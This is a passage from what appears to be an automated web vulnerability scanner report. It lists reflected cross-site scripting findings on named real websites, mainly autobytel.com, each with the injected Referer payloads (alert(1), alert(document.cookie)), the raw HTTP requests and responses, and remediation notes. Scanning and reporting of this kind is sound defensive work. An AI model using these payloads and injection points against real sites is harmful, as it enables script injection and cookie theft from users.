Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=86efc"%3balert(1)//865d083b25d

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:53:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:53:36 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:53:36 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E86efc%22%3Balert%281%29%2F%2F865d083b25d;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 104164

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~86efc";alert(1)//865d083b25d";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48763ED0-9974-8E7A-7E0212FF
...[SNIP]...

4.1958. http://www.autobytel.com/new-cars.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/new-cars.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload b6cf3--><img%20src%3da%20onerror%3dalert(1)>3dd5f85e0a7 was submitted in the Referer HTTP header. This input was echoed as b6cf3--><img src=a onerror=alert(1)>3dd5f85e0a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:54:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:54:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:54:00 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:54:00 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Eb6cf3%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E3dd5f85e0a7;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 104202

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>3dd5f85e0a7 -->
...[SNIP]...

4.1959. http://www.autobytel.com/repair-cost-calculator/my-garage.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/repair-cost-calculator/my-garage.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 846fe"%3balert(1)//69680248ec0 was submitted in the Referer HTTP header. This input was echoed as 846fe";alert(1)//69680248ec0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /repair-cost-calculator/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=846fe"%3balert(1)//69680248ec0

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:55:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:55:22 GMT
Content-Length: 22275
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:55:21 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E846fe%22%3Balert%281%29%2F%2F69680248ec0;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~846fe";alert(1)//69680248ec0";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48866FE0-D0B9-66CE-6C71FAD1
...[SNIP]...

4.1960. http://www.autobytel.com/repair-cost-calculator/my-garage.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/repair-cost-calculator/my-garage.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 7594a--><img%20src%3da%20onerror%3dalert(1)>fe2c7a68223 was submitted in the Referer HTTP header. This input was echoed as 7594a--><img src=a onerror=alert(1)>fe2c7a68223 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:55:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:55:28 GMT
Content-Length: 22313
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:55:27 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E7594a%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Efe2c7a68223;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>fe2c7a68223 -->
...[SNIP]...

4.1961. http://www.autobytel.com/sitemap/index.cfm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/sitemap/index.cfm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c0fd"%3balert(1)//38463dba680 was submitted in the Referer HTTP header. This input was echoed as 8c0fd";alert(1)//38463dba680 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /sitemap/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=8c0fd"%3balert(1)//38463dba680

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 51466
Expires: Mon, 24 Jan 2011 23:58:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:58:01 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:58:00 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E8c0fd%22%3Balert%281%29%2F%2F38463dba680;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~8c0fd";alert(1)//38463dba680";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "489EABB1-B1BF-CB67-0D71E231
...[SNIP]...

4.1962. http://www.autobytel.com/sitemap/index.cfm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/sitemap/index.cfm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 3a4d7--><img%20src%3da%20onerror%3dalert(1)>cdcd125056f was submitted in the Referer HTTP header. This input was echoed as 3a4d7--><img src=a onerror=alert(1)>cdcd125056f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:58:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:58:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:58:25 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E3a4d7%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Ecdcd125056f;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 51504

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>cdcd125056f -->
...[SNIP]...

4.1963. http://www.autobytel.com/used-cars.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/used-cars.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 3f77f--><img%20src%3da%20onerror%3dalert(1)>952fad2b451 was submitted in the Referer HTTP header. This input was echoed as 3f77f--><img src=a onerror=alert(1)>952fad2b451 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /used-cars.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=3f77f--><img%20src%3da%20onerror%3dalert(1)>952fad2b451

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 79211
Expires: Mon, 24 Jan 2011 23:57:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:57:20 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:57:20 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:57:20 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E3f77f%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E952fad2b451;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>952fad2b451 -->
...[SNIP]...

4.1964. http://www.autobytel.com/used-cars.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/used-cars.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27c0b"%3balert(1)//002cd38842 was submitted in the Referer HTTP header. This input was echoed as 27c0b";alert(1)//002cd38842 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:57:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:57:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:57:02 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:57:02 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E27c0b%22%3Balert%281%29%2F%2F002cd38842;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 79171

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~27c0b";alert(1)//002cd38842";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "4895AAAF-FE42-6669-6F37A1DC
...[SNIP]...

4.1965. http://www.autobytel.com/x22 [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/x22

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22e06"%3balert(1)//2a52afd2bf7 was submitted in the Referer HTTP header. This input was echoed as 22e06";alert(1)//2a52afd2bf7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /x22 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=22e06"%3balert(1)//2a52afd2bf7

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 23524
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 16:04:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 16:04:17 GMT
Connection: close
Set-Cookie: cweb=JONQJVS10.4.128.172CKMKY; path=/
Set-Cookie: USER_UUID_VCH=37AD3AB4%2DBAF7%2D6BA7%2DE71A97FD3CDF7150;expires=Wed, 16-Jan-2041 16:04:17 GMT;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 16:04:17 GMT;path=/
Set-Cookie: COUNT=0;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2008%3A03%3A16%27%7D;path=/
Set-Cookie: COUNT=1;expires=Wed, 16-Jan-2041 16:04:17 GMT;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2012%3A04%3A16%27%7D;expires=Wed, 16-Jan-2041 16:04:17 GMT;path=/
Set-Cookie: ID=13148%3BABTL;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 16:04:17 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7E22e06%22%3Balert%281%29%2F%2F2a52afd2bf7;path=/
Set-Cookie: PV_CT=1;path=/




 <!-- Referer: http://www.google.com/search?hl=en&q=22e06"%3baler
...[SNIP]...
ables


           //A. Newman 3/14/06 - add search variables


           //Paul Koch 8/18/10 - ad count
           s.prop32 = "ads - 0"

           //Zane 2/11/10 - BData

               s.prop34 = "Google Search~22e06";alert(1)//2a52afd2bf7";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "37AD3BA7-C5E5-980C-39F35DCA
...[SNIP]...

4.1966. http://www.autobytel.com/x22 [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/x22

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload f34b4--><img%20src%3da%20onerror%3dalert(1)>f067754e5c4 was submitted in the Referer HTTP header. This input was echoed as f34b4--><img src=a onerror=alert(1)>f067754e5c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 23587
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 16:04:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 16:04:22 GMT
Connection: close
Set-Cookie: USER_UUID_VCH=37AE39A0%2DEF73%2DFCB9%2D89EEF3E63445A8E7;expires=Wed, 16-Jan-2041 16:04:22 GMT;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 16:04:22 GMT;path=/
Set-Cookie: COUNT=0;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2008%3A03%3A22%27%7D;path=/
Set-Cookie: COUNT=1;expires=Wed, 16-Jan-2041 16:04:22 GMT;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2012%3A04%3A22%27%7D;expires=Wed, 16-Jan-2041 16:04:22 GMT;path=/
Set-Cookie: ID=13148%3BABTL;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 16:04:22 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Ef067754e5c4;path=/
Set-Cookie: PV_CT=1;path=/




 <img%
...[SNIP]...
<img src=a onerror=alert(1)>f067754e5c4 -->
...[SNIP]...

4.1967. http://www.flashedition.com/publication [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.flashedition.com
Path:	/publication

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fb84"-alert(1)-"ae36f3b6ef5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /publication?i=53162 HTTP/1.1
Host: www.flashedition.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7fb84"-alert(1)-"ae36f3b6ef5

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Tue, 25 Jan 2011 13:15:33 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
P3P: policyref="/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAo PSDo CONo TELo OUR DELo SAMo OTRo BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Set-Cookie: PHPSESSID=12dmn44gpbtk8m1bb761voe221; expires=Tue, 25-Jan-2011 17:15:33 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: u_id=12dmn44gpbtk8m1bb761voe221; expires=Wed, 25-Jan-2012 13:15:33 GMT
Set-Cookie: ie_warn=1; expires=Wed, 25-Jan-2012 13:15:33 GMT
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 6906

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=u
...[SNIP]...
atitude+","+position.coords.longitude;
});
}
*/
var flashvars = {
toolbar_behavior: "old",
//Latitude_Longitude: lat_lng,
cloud: "",
Referrer: "http://www.google.com/search?hl=en&q=7fb84"-alert(1)-"ae36f3b6ef5",
VersionNo: "viewer-184",
Client_TZ_Offset: currentTime.getTimezoneOffset(),
Browser_Plugins: plugins,
Request_URI: "/publication/?i=53162",
toolbar_type: "1",
Analytics_URL:
...[SNIP]...

4.1968. http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/community/blog/ebay-use-joomla-open-source-glue

Issue detail

